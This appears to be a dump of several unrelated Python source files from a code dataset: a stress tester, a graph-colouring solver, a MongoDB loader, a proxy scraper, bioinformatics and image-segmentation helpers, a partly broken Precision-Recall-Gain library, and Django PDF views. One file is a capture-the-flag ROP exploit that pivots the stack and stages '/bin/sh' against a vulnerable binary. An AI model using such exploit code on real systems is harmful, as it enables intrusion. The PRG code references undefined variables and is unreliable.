+{"seq_id":"455201760","text":"import os\nfrom random import randint as get\n\ndef gen():\n\tf = open(\"input.txt\", \"w\")\n\tn = get(1, 30)\n\tm = get(1, 30)\n\tq = get(1, 20)\n\tprint(n, m, q, file = f)\n\tfor i in range(n):\n\t\tfor i in range(m):\n\t\t\tprint(get(0, 1), end = \"\", file = f)\n\t\tprint(file = f)\n\tfor i in range(q):\n\t\tprint(get(1, n), get(1, m), get(1, 10), file = f)\n\ndef main():\n\tos.system(\"make c && make stupid\")\n\tfor te in range(10**6):\n\t\tgen()\n\t\tos.system(\"./c < input.txt > output.txt\")\n\t\tout = open(\"output.txt\", \"r\").read()\n\t\tos.system(\"./stupid < input.txt > output.txt\")\n\t\tans = open(\"output.txt\", \"r\").read()\n\t\tif (ans != out):\n\t\t\tprint(\"WA\", te)\n\t\t\tprint(\"input = \")\n\t\t\tprint(open(\"input.txt\", \"r\").read())\n\t\t\tprint(\"ans = \", ans)\n\t\t\tprint(\"out = \", out)\n\t\t\tbreak\n\t\tprint(\"OK\", te)\nmain()","sub_path":"2020/CF/641/stress.py","file_name":"stress.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"611681427","text":"'''\nTaras Zherebetskyy.\nConstraint Satisfacion Problems\n\nThe program, composed by a class Node that creates objects stored in an array alled graph.\nthe nodes are connected by pointers \n\nX set of variables: nodes rapresented ny numbers {x0, x1, x2, x3, x4, x5, x6}\nD set of domains: Colors in this case {\"Red\", \"Green\", \"Blue\"}\nC set of constraints {\"will be defined at the end, when problem is solved\"}\n'''\n\nclass Node:\n def __init__(self, num):\n self.node = num #hold the number of the node\n self.color = \"\" #hold the color \n self.vertex = [] # hold all the verteces\n \n def set_connection(self, vertex): # the function set a pointer to the Node it is connected to and viceversa\n for i in vertex:\n self.vertex.append(i)\n i.vertex.append(self)\n\n def print(self): #just a print function\n print(f'''\n Node: {self.node}\n Color: \\t{self.color}\n Verteces:\\t ''', end='')\n for i in self.vertex: print(i.node,\":\", i.color, \",\", end=\" \")\n\ndef print_graph(graph): #print function\n for i in graph:\n i.print()\n\ndef print_constraint(graph):\n print(\"\\n\", \"C = {\", end=\" \")\n for i in graph:\n print(f\"<{i.node},{i.color}>\", end=\" \")\n print(\"}\")\n\ndef collision(node):\n for ver in node.vertex: #loop through all verteces and return true if there are collision\n if node.color == ver.color: return True\n return False\n\ndef compile_colors(graph, colors):\n for node in graph: # Looping throught each node\n i = 0 #setting the node with color 0\n node.color = colors[i] \n while collision(node):\n i += 1\n if i > 2: \n print(\"This graph can't be solved\")\n node.color = \"No color\"\n return\n node.color = colors[i]\n\n'''\n MAIN STARTS HERE\n'''\ncolors = [\"Red\", \"Green\", \"Blue\"] #colors that are used\ngraph = [] #this list will contain each node in the graph\nj = 0 # j will number each node\n\n#this loop will append all the nodes inside the array\nfor i in range(6):\n graph.append(Node(j))\n j += 1\n\n# setting the connections. the function \"set_connection\" will connect a pointer to the node it is conected and viceversa\ngraph[0].set_connection([graph[1], graph[2]])\ngraph[2].set_connection([graph[1], graph[3], graph[5], graph[4]])\ngraph[1].set_connection([graph[3]])\ngraph[3].set_connection([graph[5]])\ngraph[4].set_connection([graph[5]])\n\n'''\n# this node is used to check if the function can recognize if a graph is not solvable \n# uncomment for test.\ngraph.append(Node(6))\ngraph[6].set_connection([graph[4], graph[5], graph[2]])\n'''\n\n'''\n# uncomment the next for the change the structure of the graph adding another node.\n# in this case it works becasue the node 6 doesn't collide with other colors\ngraph.append(Node(6))\ngraph[6].set_connection([graph[4], graph[2], graph[0]])\n'''\n\ncompile_colors(graph, colors)\nprint_graph(graph)\nprint_constraint(graph)\n","sub_path":"CSP.py","file_name":"CSP.py","file_ext":"py","file_size_in_byte":2970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"613781146","text":"from zio import *\n\noffset = 112\n\naddr_plt_read = 0x08048390 # objdump -d -j.plt bof | grep \"read\"\naddr_plt_write = 0x080483c0 # objdump -d -j.plt bof | grep \"write\"\n\n#./rp-lin-x86 --file=bof --rop=3 --unique > gadgets.txt\npppop_ret = 0x0804856c\npop_ebp_ret = 0x08048453\nleave_ret = 0x08048481\n\nstack_size = 0x800\naddr_bss = 0x0804a020 # readelf -S bof | grep \".bss\"\nbase_stage = addr_bss + stack_size\n\ntarget = \"./bof\"\nio = zio((target))\n\nio.read_until('Welcome to XDCTF2015~!\\n')\n# io.gdb_hint([0x80484bd])\n\nbuf1 = 'A' * offset\nbuf1 += l32(addr_plt_read)\nbuf1 += l32(pppop_ret)\nbuf1 += l32(0)\nbuf1 += l32(base_stage)\nbuf1 += l32(100)\nbuf1 += l32(pop_ebp_ret)\nbuf1 += l32(base_stage)\nbuf1 += l32(leave_ret)\nio.writeline(buf1)\n\ncmd = \"/bin/sh\"\n\nbuf2 = 'AAAA'\nbuf2 += l32(addr_plt_write)\nbuf2 += 'AAAA'\nbuf2 += l32(1)\nbuf2 += l32(base_stage+80)\nbuf2 += l32(len(cmd))\nbuf2 += 'A' * (80-len(buf2))\nbuf2 += cmd + '\\x00'\nbuf2 += 'A' * (100-len(buf2))\nio.writeline(buf2)\nio.interact()\n","sub_path":"xdctf_2015/exploit2/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"395603157","text":"\"\"\"\nThis module adds the RPG database from earlier this week to MongoDB.\n\"\"\"\n\nimport sqlite3\nimport numpy as np\nimport pandas as pd\nimport pymongo\n# REMOVED PASSWORD\nclient = pymongo.MongoClient(\"mongodb://will_cotton:@cluster0-shard-00-00-kwojs.mongodb.net:27017,cluster0-shard-00-01-kwojs.mongodb.net:27017,cluster0-shard-00-02-kwojs.mongodb.net:27017/test?ssl=true&replicaSet=Cluster0-shard-0&authSource=admin&retryWrites=true&w=majority\")\ndb = client.test\n\nconn = sqlite3.connect('rpg_db.sqlite3')\ncurs = conn.cursor()\n\n\ntable_titles = ['armory_item', 'armory_weapon', 'charactercreator_character',\n 'charactercreator_character_inventory',\n 'charactercreator_cleric', 'charactercreator_fighter',\n 'charactercreator_mage', 'charactercreator_necromancer',\n 'charactercreator_thief']\n\ntable_schema_dict = {}\nfor table in table_titles:\n query = 'PRAGMA table_info(' + table + ');'\n curs.execute(query)\n results = curs.fetchall()\n col_names = []\n for result in results:\n col_names.append(result[1])\n table_schema_dict[table] = col_names\n\ntables_listed = []\n\nfor table in table_titles:\n col_names = table_schema_dict[table]\n query = \"SELECT * FROM \" + table + \";\"\n curs.execute(query)\n rows = curs.fetchall()\n table_rows_list = []\n for row in rows:\n i = 0\n row_dicted = {}\n for item in row:\n row_dicted[col_names[i]] = item\n i += 1\n table_rows_list.append(row_dicted)\n tables_listed.append(table_rows_list)\n\nfor table in tables_listed:\n db.test.insert_many(table)\n","sub_path":"module3-nosql-and-document-oriented-databases/mongo_rpg.py","file_name":"mongo_rpg.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"410583015","text":"#!user/bin/env/python\n#-*-coding:utf-8-*-\n# author: albert time:2019/7/30\n\nfrom .get_page import get_page\nfrom pyquery import PyQuery as pq\n\nclass ProxyMetaclass(type):\n #元类\n def __new__(cls, name, bases, attrs):\n count = 0\n attrs['__CrawlFunc__'] = []\n for k,v in attrs.items():\n if 'crawl_' in k:\n attrs['__CrawlFunc__'].append(k)\n count += 1\n attrs['__CrawlFuncCount__'] = count\n return type.__new__(cls,name,bases,attrs)\n \nclass Crawler(object,metaclass=ProxyMetaclass):\n def get_proxies(self,callback):\n proxies = []\n for proxy in eval(\"self.{}()\".format(callback)):\n print('成功获取代理',proxy)\n proxies.append(proxy)\n return proxies\n \n def crawl_xici(self):\n '''\n 获取代理西刺:https://www.xicidaili.com/\n :param page:页码\n :return:代理\n '''\n url = 'https://www.xicidaili.com/'\n html = get_page(url)\n if html:\n doc = pq(html)\n trs = doc('#ip_list tr:gt(1)').items()\n # print(trs)\n for tr in trs:\n # print(tr)\n ip = tr.find('td:nth-child(2)').text()\n port = tr.find('td:nth-child(3)').text()\n if ip is not '' and port is not '':\n #代理生成器\n yield ':'.join([ip, port])\n # def crawl_proxy360(self):\n # pass\n # def crawl_goubanjia(self):\n # pass\n def crawl_kuaidaili(self):\n url = 'https://www.kuaidaili.com/ops/'\n html = get_page(url)\n if html:\n doc = pq(html)\n trs = doc('#freelist > table > tbody tr').items()\n for tr in trs:\n ip = tr.find('td:nth-child(1)').text()\n port = tr.find('td:nth-child(2)').text()\n print(':'.join([ip, port]))\n ","sub_path":"dailichi/proxy_pool/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"605950218","text":"# iter over fasta sequences\n\nfrom itertools import groupby\nimport random\nimport sys\n\n\ndef fasta_iter(fasta_file):\n for header, group in groupby(fasta_file, lambda line: line[0] == \">\"):\n if header:\n line = group.next()\n ensembl_id = line[1:].strip()\n else:\n sequence = ''.join(line.strip() for line in group)\n yield ensembl_id, sequence\n\n\ndef filter_file(inputf, outputf, N):\n sequences = []\n with open(outputf, 'w+') as f:\n for name, seq in fasta_iter(open(inputf)):\n sequences.append((name, seq))\n\n for name, seq in sorted(sequences, key=lambda x: len(x[1]), reverse=True)[:N]:\n f.write(\">%s\\n%s\\n\" % (name, seq))\n\n\nfilter_file(sys.argv[1], sys.argv[2], int(sys.argv[3]))\n\n\n","sub_path":"sga_version/select_longest.py","file_name":"select_longest.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"540262575","text":"\"\"\" Software to create Precision-Recall-Gain curves.\n\nPrecision-Recall-Gain curves and how to cite this work is available at\nhttp://www.cs.bris.ac.uk/~flach/PRGcurves/.\n\"\"\"\nimport warnings\nimport numpy as np\nfrom typing import Iterable\nimport matplotlib.pyplot as plt\n\nepsilon = 1e-7\n\n\ndef precision(tp, fp):\n return tp / (tp + fp + epsilon)\n\n\ndef recall(tp, fn):\n return tp / (tp + fn + epsilon)\n\n\ndef precision_gain(tp, fn, fp, tn):\n \"\"\"Calculates Precision Gain from the contingency table\n\n This function calculates Precision Gain from the entries of the contingency\n table: number of true positives (TP), false negatives (FN), false positives\n (FP), and true negatives (TN). More information on Precision-Recall-Gain\n curves and how to cite this work is available at\n http://www.cs.bris.ac.uk/~flach/PRGcurves/.\n \"\"\"\n n_pos = tp + fn\n n_neg = fp + tn\n prec_gain = 1. - (n_pos / (n_neg + epsilon)) * (fp / (tp + epsilon))\n if isinstance(prec_gain, Iterable):\n prec_gain[tn + fn == 0] = 0\n elif tn + fn == 0:\n prec_gain = 0\n return prec_gain\n\n\ndef recall_gain(tp, fn, fp, tn):\n \"\"\"Calculates Recall Gain from the contingency table\n\n This function calculates Recall Gain from the entries of the contingency\n table: number of true positives (TP), false negatives (FN), false positives\n (FP), and true negatives (TN). More information on Precision-Recall-Gain\n curves and how to cite this work is available at\n http://www.cs.bris.ac.uk/~flach/PRGcurves/.\n\n Args:\n tp (float) or ([float]): True Positives\n fn (float) or ([float]): False Negatives\n fp (float) or ([float]): False Positives\n tn (float) or ([float]): True Negatives\n Returns:\n (float) or ([float])\n \"\"\"\n n_pos = tp + fn\n n_neg = fp + tn\n recall_gain = 1. 
- (n_pos / (n_neg + epsilon)) * (fn / (tp + epsilon))\n if isinstance(recall_gain, Iterable):\n recall_gain[tn + fn == 0] = 1\n elif tn + fn == 0:\n recall_gain = 1\n return recall_gain\n\ndef create_segments(y_true, y_pred):\n \"\"\"\n for each class:\n sort descending confidence\n for each confidence level:\n n_positive, n_negative in gr truth\n , slice batch col\n sort descending confidence\n \"\"\"\n n_samples, n_classes = np.shape(y_true)\n n_true_pos_per_class = y_true.sum(axis=0)\n n_true_neg_per_class = n_samples*np.ones(n_classes) - n_true_pos_per_class\n\n threshed_metrics = []\n for thresh in np.linspace(1,0,101): # exactly 0.01 apart\n pred_threshed = (y_pred >= thresh)\n # num_correct = ((pred_threshed == y_true).sum(dim=0))\n\n # these are classwise\n tp = (y_true * y_pred).sum(dim=0)\n tn = ((1 - y_true) * (1 - y_pred)).sum(dim=0)\n fp = ((1 - y_true) * y_pred).sum(dim=0)\n fn = (y_true * (1 - y_pred)).sum(dim=0)\n\n # these are class-wise inference\n precisions = precision(tp, fp)\n precision_gains = precision_gain(tp, fn, fp, tn)\n recalls = recall(tp, fn)\n recall_gains = recall_gain(tp, fn, fp, tn)\n\n f1s = 2* (precisions*recalls) / (precisions + recalls + epsilon)\n f1s = f1s.clamp(min=epsilon, max=1-epsilon) # TODO should be unnecessary\n\n threshed_metrics.append(dict(thresh=thresh,\n tp=tp,\n tn=tn,\n fp=fp,\n fn=fn,\n precisions=precisions,\n precision_gains=precision_gains,\n recalls=recalls,\n recall_gains=recall_gains,\n f1s=f1s))\n\n return threshed_metrics\n\ndef get_point(curve, index):\n keys = curve.keys()\n point = np.zeros(len(keys))\n key_indices = dict()\n for i, key in enumerate(keys):\n point[i] = curve[key][index]\n key_indices[key] = i\n return [point, key_indices]\n\n\ndef insert_point(new_point, key_indices, curve, precision_gain=0,\n recall_gain=0, is_crossing=0):\n for key in key_indices.keys():\n curve[key] = np.insert(curve[key], 0, new_point[key_indices[key]])\n curve['precision_gain'][0] = precision_gain\n curve['recall_gain'][0] = recall_gain\n curve['is_crossing'][0] = is_crossing\n new_order = np.lexsort((-curve['precision_gain'], curve['recall_gain']))\n for key in curve.keys():\n curve[key] = curve[key][new_order]\n return curve\n\n\ndef _create_crossing_points(curve, n_pos, n_neg, n_classes):\n n = n_pos + n_neg\n curve['is_crossing'] = np.zeros(n_classes)\n # introduce a crossing point at the crossing through the y-axis\n j = np.amin(np.where(curve['recall_gain'] >= 0)[0])\n if curve['recall_gain'][j] > 0: # otherwise there is a point on the boundary and no need for a crossing point\n [point_1, key_indices_1] = get_point(curve, j)\n [point_2, key_indices_2] = get_point(curve, j - 1)\n delta = point_1 - point_2\n if delta[key_indices_1['TP']] > 0:\n alpha = (n_pos * n_pos / n - curve['TP'][j - 1]) / delta[key_indices_1['TP']]\n else:\n alpha = 0.5\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n new_point = point_2 + alpha * delta\n\n new_prec_gain = precision_gain(new_point[key_indices_1['TP']], new_point[key_indices_1['FN']],\n new_point[key_indices_1['FP']], new_point[key_indices_1['TN']])\n curve = insert_point(new_point, key_indices_1, curve,\n precision_gain=new_prec_gain, is_crossing=1)\n\n # now introduce crossing points at the crossings through the non-negative part of the x-axis\n x = curve['recall_gain']\n y = curve['precision_gain']\n temp_y_0 = np.append(y, 0)\n temp_0_y = np.append(0, y)\n temp_1_x = np.append(1, x)\n indices = np.where(np.logical_and((temp_y_0 * temp_0_y < 0), (temp_1_x >= 
0)))[0]\n for i in indices:\n cross_x = x[i - 1] + (-y[i - 1]) / (y[i] - y[i - 1]) * (x[i] - x[i - 1])\n [point_1, key_indices_1] = get_point(curve, i)\n [point_2, key_indices_2] = get_point(curve, i - 1)\n delta = point_1 - point_2\n if delta[key_indices_1['TP']] > 0:\n alpha = (n_pos * n_pos / (n - n_neg * cross_x) - curve['TP'][i - 1]) / delta[key_indices_1['TP']]\n else:\n alpha = (n_neg / n_pos * curve['TP'][i - 1] - curve['FP'][i - 1]) / delta[key_indices_1['FP']]\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n new_point = point_2 + alpha * delta\n\n new_rec_gain = recall_gain(new_point[key_indices_1['TP']], new_point[key_indices_1['FN']],\n new_point[key_indices_1['FP']], new_point[key_indices_1['TN']])\n curve = insert_point(new_point, key_indices_1, curve,\n recall_gain=new_rec_gain, is_crossing=1)\n i += 1\n indices += 1\n x = curve['recall_gain']\n y = curve['precision_gain']\n temp_y_0 = np.append(y, 0)\n temp_0_y = np.append(0, y)\n temp_1_x = np.append(1, x)\n return curve\n\n\ndef create_prg_curve(y_true, y_pred):\n \"\"\"Precision-Recall-Gain curve\n\n This function creates the Precision-Recall-Gain curve from the vector of\n y_true and vector of scores where higher score indicates a higher\n probability to be positive. More information on Precision-Recall-Gain\n curves and how to cite this work is available at\n http://www.cs.bris.ac.uk/~flach/PRGcurves/.\n \"\"\"\n threshed_metrics = create_segments(y_true, y_pred)\n # calculate recall gains and precision gains for all thresholds\n curve = dict()\n curve['pos_score'] = np.insert(segments['pos_score'], 0, np.inf) # start at inf\n curve['neg_score'] = np.insert(segments['neg_score'], 0, -np.inf) # start at -inf\n curve['TP'] = np.insert(np.cumsum(segments['pos_count']), 0, 0) # start at 0\n curve['FP'] = np.insert(np.cumsum(segments['neg_count']), 0, 0) # start at 0\n curve['FN'] = n_pos - curve['TP']\n curve['TN'] = n_neg - curve['FP']\n # curve['TP'] = (y_true * y_pred).sum(axis=0) # .to(torch.float32)\n # curve['TN'] = ((1 - y_true) * (1 - y_pred)).sum(axis=0) # .to(torch.float32)\n # curve['FP'] = ((1 - y_true) * y_pred).sum(axis=0) # .to(torch.float32)\n # curve['FN'] = (y_true * (1 - y_pred)).sum(axis=0) # .to(torch.float32)\n\n curve['precision'] = precision(curve['TP'], curve['FP'])\n curve['recall'] = recall(curve['TP'], curve['FN'])\n curve['precision_gain'] = precision_gain(curve['TP'], curve['FN'], curve['FP'], curve['TN'])\n curve['recall_gain'] = recall_gain(curve['TP'], curve['FN'], curve['FP'], curve['TN'])\n curve = _create_crossing_points(curve, n_pos, n_neg, n_classes)\n\n curve['in_unit_square'] = np.logical_and(curve['recall_gain'] >= 0,\n curve['precision_gain'] >= 0)\n return curve #tp, fp, tn, fn, precision_gain, recall_gain, n_thresh\n\n\ndef calc_auprg(prg_curve):\n \"\"\"Calculate area under the Precision-Recall-Gain curve\n\n This function calculates the area under the Precision-Recall-Gain curve\n from the results of the function create_prg_curve. 
More information on\n Precision-Recall-Gain curves and how to cite this work is available at\n http://www.cs.bris.ac.uk/~flach/PRGcurves/.\n \"\"\"\n area = 0\n recall_gain = prg_curve['recall_gain']\n precision_gain = prg_curve['precision_gain']\n for i in range(1, len(recall_gain)):\n if (not np.isnan(recall_gain[i - 1])) and (recall_gain[i - 1] >= 0):\n width = recall_gain[i] - recall_gain[i - 1]\n height = (precision_gain[i] + precision_gain[i - 1]) / 2\n area += width * height\n return (area)\n\n\ndef convex_hull(points):\n \"\"\"Computes the convex hull of a set of 2D points.\n\n Input: an iterable sequence of (x, y) pairs representing the points.\n Output: a list of vertices of the convex hull in counter-clockwise order,\n starting from the vertex with the lexicographically smallest coordinates.\n Implements Andrew's monotone chain algorithm. O(n log n) complexity.\n Source code from:\n https://en.wikibooks.org/wiki/Algorithm_Implementation/Geometry/Convex_hull/Monotone_chain\n \"\"\"\n\n # Sort the points lexicographically (tuples are compared lexicographically).\n # Remove duplicates to detect the case we have just one unique point.\n points = sorted(set(points))\n\n # Boring case: no points or a single point, possibly repeated multiple times.\n if len(points) <= 1:\n return points\n\n # 2D cross product of OA and OB vectors, i.e. z-component of their 3D cross product.\n # Returns a positive value, if OAB makes a counter-clockwise turn,\n # negative for clockwise turn, and zero if the points are collinear.\n def cross(o, a, b):\n return (a[0] - o[0]) * (b[1] - o[1]) - (a[1] - o[1]) * (b[0] - o[0])\n\n # Build upper hull\n upper = []\n for p in reversed(points):\n while len(upper) >= 2 and cross(upper[-2], upper[-1], p) <= 0:\n upper.pop()\n upper.append(p)\n\n return upper\n\n\ndef plot_prg(prg_curve, show_convex_hull=True, show_f_calibrated_scores=False):\n \"\"\"Plot the Precision-Recall-Gain curve\n\n This function plots the Precision-Recall-Gain curve resulting from the\n function create_prg_curve using ggplot. More information on\n Precision-Recall-Gain curves and how to cite this work is available at\n http://www.cs.bris.ac.uk/~flach/PRGcurves/.\n\n @param prg_curve the data structure resulting from the function create_prg_curve\n @param show_convex_hull whether to show the convex hull (default: TRUE)\n @param show_f_calibrated_scores whether to show the F-calibrated scores (default:TRUE)\n @return the ggplot object which can be plotted using print()\n @details This function plots the Precision-Recall-Gain curve, indicating\n for each point whether it is a crossing-point or not (see help on\n create_prg_curve). 
By default, only the part of the curve\n within the unit square [0,1]x[0,1] is plotted.\n @examples\n labels = c(1,1,1,0,1,1,1,1,1,1,0,1,1,1,0,1,0,0,1,0,0,0,1,0,1)\n scores = (25:1)/25\n plot_prg(create_prg_curve(labels,scores))\n \"\"\"\n pg = prg_curve['precision_gain']\n rg = prg_curve['recall_gain']\n\n fig = plt.figure(figsize=(6, 5))\n plt.clf()\n plt.axes(frameon=False)\n ax = fig.gca()\n ax.set_xticks(np.arange(0, 1.25, 0.25))\n ax.set_yticks(np.arange(0, 1.25, 0.25))\n ax.grid(b=True)\n ax.set_xlim((-0.05, 1.02))\n ax.set_ylim((-0.05, 1.02))\n ax.set_aspect('equal')\n # Plot vertical and horizontal lines crossing the 0 axis\n plt.axvline(x=0, ymin=-0.05, ymax=1, color='k')\n plt.axhline(y=0, xmin=-0.05, xmax=1, color='k')\n plt.axvline(x=1, ymin=0, ymax=1, color='k')\n plt.axhline(y=1, xmin=0, xmax=1, color='k')\n # Plot cyan lines\n indices = np.arange(np.argmax(prg_curve['in_unit_square']) - 1,\n len(prg_curve['in_unit_square']))\n plt.plot(rg[indices], pg[indices], 'c-', linewidth=2)\n # Plot blue lines\n indices = np.logical_or(prg_curve['is_crossing'],\n prg_curve['in_unit_square'])\n plt.plot(rg[indices], pg[indices], 'b-', linewidth=2)\n # Plot blue dots\n indices = np.logical_and(prg_curve['in_unit_square'],\n True - prg_curve['is_crossing'])\n plt.scatter(rg[indices], pg[indices], marker='o', color='b', s=40)\n # Plot lines out of the boundaries\n plt.xlabel('Recall Gain')\n plt.ylabel('Precision Gain')\n\n valid_points = np.logical_and(~ np.isnan(rg), ~ np.isnan(pg))\n upper_hull = convex_hull(zip(rg[valid_points], pg[valid_points]))\n rg_hull, pg_hull = zip(*upper_hull)\n if show_convex_hull:\n plt.plot(rg_hull, pg_hull, 'r--')\n if show_f_calibrated_scores:\n raise Exception(\"Show calibrated scores not implemented yet\")\n plt.show()\n return fig\n\n\ndef plot_pr(prg_curve):\n p = prg_curve['precision']\n r = prg_curve['recall']\n\n fig = plt.figure(figsize=(6, 5))\n plt.clf()\n plt.axes(frameon=False)\n ax = fig.gca()\n ax.set_xticks(np.arange(0, 1.25, 0.25))\n ax.set_yticks(np.arange(0, 1.25, 0.25))\n ax.grid(b=True)\n ax.set_xlim((-0.05, 1.02))\n ax.set_ylim((-0.05, 1.02))\n ax.set_aspect('equal')\n # Plot vertical and horizontal lines crossing the 0 axis\n plt.axvline(x=0, ymin=-0.05, ymax=1, color='k')\n plt.axhline(y=0, xmin=-0.05, xmax=1, color='k')\n plt.axvline(x=1, ymin=0, ymax=1, color='k')\n plt.axhline(y=1, xmin=0, xmax=1, color='k')\n # Plot blue lines\n plt.plot(r, p, 'ob-', linewidth=2)\n plt.xlabel('Recall')\n plt.ylabel('Precision')\n\n plt.show()\n return fig\n","sub_path":"Python_package/prg/prg.py","file_name":"prg.py","file_ext":"py","file_size_in_byte":14964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
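The gain formulas in the record above reduce to 1 - (pi/(1-pi)) * FP/TP for precision gain and 1 - (pi/(1-pi)) * FN/TP for recall gain, where pi is the positive prevalence. A worked check on one contingency table (the counts are illustrative, and epsilon is dropped since TP and the negatives are nonzero):

```python
# Worked example of precision_gain / recall_gain on a single contingency table.
tp, fn, fp, tn = 80, 20, 30, 70          # illustrative counts
n_pos, n_neg = tp + fn, fp + tn          # 100 positives, 100 negatives

precision_gain = 1 - (n_pos / n_neg) * (fp / tp)
recall_gain    = 1 - (n_pos / n_neg) * (fn / tp)

print(round(precision_gain, 3))  # 0.625
print(round(recall_gain, 3))     # 0.75
```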
+{"seq_id":"560881268","text":"\"\"\"Module for segmenting cells and markers.\"\"\"\n\nfrom jicbioimage.transform import (\n dilate_binary,\n invert,\n remove_small_objects,\n max_intensity_projection,\n)\nfrom jicbioimage.segment import (\n connected_components,\n watershed_with_seeds,\n)\n\nfrom utils import threshold_abs, remove_large_segments\n\n\ndef cell_segmentation(wall_intensity2D, wall_mask2D, max_cell_size):\n \"\"\"Return image segmented into cells.\"\"\"\n seeds = dilate_binary(wall_mask2D)\n seeds = invert(seeds)\n seeds = remove_small_objects(seeds, min_size=10)\n seeds = connected_components(seeds, background=0)\n segmentation = watershed_with_seeds(-wall_intensity2D, seeds=seeds)\n segmentation = remove_large_segments(segmentation, max_cell_size)\n return segmentation\n\n\ndef marker_segmentation(marker_intensity3D, wall_mask3D, threshold):\n \"\"\"Return fluorescent marker segmentation.\"\"\"\n marker_intensity3D = marker_intensity3D * wall_mask3D\n markers2D = max_intensity_projection(marker_intensity3D)\n markers2D = threshold_abs(markers2D, threshold)\n markers2D = remove_small_objects(markers2D, min_size=50)\n return connected_components(markers2D, background=0)\n","sub_path":"scripts/segment.py","file_name":"segment.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"203836026","text":"# -*- coding: utf-8 -*-\nfrom django.shortcuts import render\nfrom .models import department, employee, truck_type, truck, truck_list_report, truck_header_report\nfrom .models import master_package, dn_list_report, dn_header_report\nfrom .models import po_header_report, supplier, replacement_list_report, replacement_header_report\nfrom django.http import HttpResponse\n\nfrom django.template.loader import render_to_string\nfrom weasyprint import HTML\nfrom mysite.utils import render_to_pdf #created in step 4\n\nimport math\nimport tempfile\n\ndef index(request):\n    return render(request, 'blog/index.html', {})\n\ndef truck_control(request):\n    return render(request, 'blog/truck_control.html', {})\n\ndef delivery_note(request):\n    return render(request, 'blog/delivery_note.html', {})\n\ndef replacement_order(request):\n    return render(request, 'blog/replacement_order.html', {})\n\ndef truck_control_pdf(request):\n    page = 10\n\n    all_count = truck_list_report.objects.count()\n    all_page_no = math.ceil(all_count/page)\n\n    \"\"\"Generate pdf.\"\"\"\n    list_pdf = []\n    for i in range(0, all_page_no):\n        query_max = (i+1)*page\n        if query_max > all_count:\n            query_max = all_count\n        header_report = truck_header_report.objects.filter(truck_control_no='1234')\n        list_report = truck_list_report.objects.all().order_by('list_no')[(i*page):query_max]\n        html_string = render_to_string('blog/truck_control.html', {'header_report': header_report, 'list_report': list_report, 'start_index': (i*page), 'page_no': (i+1), 'all_page_no': all_page_no})\n        pdf = HTML(string=html_string)\n        list_pdf.append(pdf)\n\n    lid_render = []\n    val = []\n    boo_first = True\n    pdf_data = None\n\n    for pdf in list_pdf:\n        rendered = pdf.render()  # render each chunk only once\n        if boo_first:\n            boo_first = False\n            pdf_data = rendered\n        lid_render.append(rendered)\n\n    for doc in lid_render:\n        for p in doc.pages:\n            val.append(p)\n\n    pdf_file = pdf_data.copy(val).write_pdf()  # use metadata of the first rendered document\n\n    http_response = HttpResponse(pdf_file, content_type='application/pdf')\n    http_response['Content-Disposition'] = 'attachment; filename=\"truck_control.pdf\"'\n\n    return http_response\n\ndef index_pdf(request):\n    \"\"\"Generate pdf.\"\"\"\n    # Model data\n    #entryreport = Entry.objects.all().order_by('rating')\n\n    # Rendered\n    html_string = render_to_string('blog/index.html')\n    html = HTML(string=html_string)\n    result = html.write_pdf()\n    # Creating http response\n    response = HttpResponse(content_type='application/pdf;')\n    response['Content-Disposition'] = 'inline; filename=truck_control.pdf'\n    response['Content-Transfer-Encoding'] = 'binary'\n    with tempfile.NamedTemporaryFile(delete=True) as output:\n        output.write(result)\n        output.flush()\n        output = open(output.name, 'rb')\n        response.write(output.read())\n\n    return response\n\ndef delivery_note_pdf(request):\n    page = 10\n\n    all_count = dn_list_report.objects.count()\n    all_page_no = math.ceil(all_count/page)\n\n    \"\"\"Generate pdf.\"\"\"\n\n    list_pdf = []\n    for i in range(0, all_page_no):\n        query_max = (i+1)*page\n        if query_max > all_count:\n            query_max = all_count\n        header_report = dn_header_report.objects.filter(dn_no='KOCH200923001')\n        list_report = dn_list_report.objects.all().order_by('list_no')[(i*page):query_max]\n        html_string = render_to_string('blog/delivery_note.html', {'header_report': header_report, 'list_report': list_report, 'start_index': (i*page), 'page_no': (i+1), 'all_page_no': all_page_no})\n        pdf = HTML(string=html_string)\n        list_pdf.append(pdf)\n\n    lid_render = []\n    val = []\n    boo_first = True\n    pdf_data = None\n\n    for pdf in list_pdf:\n        rendered = pdf.render()  # render each chunk only once\n        if boo_first:\n            boo_first = False\n            pdf_data = rendered\n        lid_render.append(rendered)\n\n    for doc in lid_render:\n        for p in doc.pages:\n            val.append(p)\n\n    pdf_file = pdf_data.copy(val).write_pdf()  # use metadata of the first rendered document\n\n    http_response = HttpResponse(pdf_file, content_type='application/pdf')\n    http_response['Content-Disposition'] = 'attachment; filename=\"delivery_note_report.pdf\"'\n\n    return http_response\n\ndef replacement_order_pdf(request):\n    page = 8\n\n    all_count = replacement_list_report.objects.count()\n    all_page_no = math.ceil(all_count/page)\n\n    \"\"\"Generate pdf.\"\"\"\n\n    list_pdf = []\n    for i in range(0, all_page_no):\n        query_max = (i+1)*page\n        if query_max > all_count:\n            query_max = all_count\n        header_report = replacement_header_report.objects.filter(replacement_no='RN-202009-001')\n        list_report = replacement_list_report.objects.all().order_by('list_no')[(i*page):query_max]\n        html_string = render_to_string('blog/replacement_order.html', {'header_report': header_report, 'list_report': list_report, 'start_index': (i*page), 'page_no': (i+1), 'all_page_no': all_page_no})\n        pdf = HTML(string=html_string)\n        list_pdf.append(pdf)\n\n    